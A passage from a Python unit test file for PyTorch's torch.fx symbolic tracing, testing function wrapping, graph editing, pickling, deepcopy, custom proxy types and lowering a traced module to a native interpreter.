# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in traced.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
